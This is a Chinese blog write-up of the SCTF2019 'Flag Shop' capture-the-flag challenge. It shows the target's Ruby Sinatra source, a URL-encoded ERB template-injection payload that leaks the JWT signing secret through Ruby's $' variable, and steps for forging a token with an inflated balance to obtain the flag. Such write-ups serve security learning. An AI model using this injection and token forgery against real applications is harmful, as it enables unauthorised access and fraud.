[SCTF2019]Flag Shop

最新推荐文章于 2025-02-15 00:18:37 发布

浩歌已行

最新推荐文章于 2025-02-15 00:18:37 发布

阅读量1.8k

点赞数 4

CC 4.0 BY-SA版权

本文链接：https://blog.csdn.net/qq_43801002/article/details/106022306

#题目：
在这里插入图片描述
1.发现robots.txt，里面提示/filebak，查看filebak发现源码

require 'sinatra'
require 'sinatra/cookies'
require 'sinatra/json'
require 'jwt'
require 'securerandom'
require 'erb'

set :public_folder, File.dirname(__FILE__) + '/static'

FLAGPRICE = 1000000000000000000000000000
ENV["SECRET"] = SecureRandom.hex(64)

configure do
  enable :logging
  file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")
  file.sync = true
  use Rack::CommonLogger, file
end

get "/" do
  redirect '/shop', 302
end

get "/filebak" do
  content_type :text
  erb IO.binread __FILE__
end

get "/api/auth" do
  payload = { uid: SecureRandom.uuid , jkl: 20}
  auth = JWT.encode payload,ENV["SECRET"] , 'HS256'
  cookies[:auth] = auth
end

get "/api/info" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  json({uid: auth[0]["uid"],jkl: auth[0]["jkl"]})
end

get "/shop" do
  erb :shop
end

get "/work" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  auth = auth[0]
  unless params[:SECRET].nil?
    if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")
      puts ENV["FLAG"]
    end
  end

  if params[:do] == "#{params[:name][0,7]} is working" then

    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result

  end
end

post "/shop" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }

  if auth[0]["jkl"] < FLAGPRICE then

    json({title: "error",message: "no enough jkl"})
  else

    auth << {flag: ENV["FLAG"]}
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    json({title: "success",message: "jkl is good thing"})
  end
end


def islogin
  if cookies[:auth].nil? then
    redirect to('/shop')
  end
end

2.考察Ruby ERB注入https://www.anquanke.com/post/id/86867学习一下
重点代码

  if params[:do] == "#{params[:name][0,7]} is working" then

    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result

  end
end

意思就是如果传入的参数do和name一致，则会输出params[:name][0,7]} working successfully!。ruby里有预定义变量

$'-最后一次成功匹配右边的字符串
构造do=<%= $^{'}$ ’%>,记得把里面内容转成十六进制
所以最终就是
work?SECRET=&name=%3c%25%3d%24%27%25%3e&do=%3c%25%3d%24%27%25%3e%20is%20working
3.
GET界面发送，得到JWT加密文本，和组成其的secret，
现在要将回显的jwt解密，secret填到对应位置，并修改JKL，JKL就是你有的money，最终再次得到新的JWT

4.将新的JWT替换进去，修改为POST传参，shop页面
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jwgBnQCO-1589012945468)(https://upload-images.jianshu.io/upload_images/18308497-08ab002faf00c7c8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
发送，回显又一个JWT，拿去解密

得到flag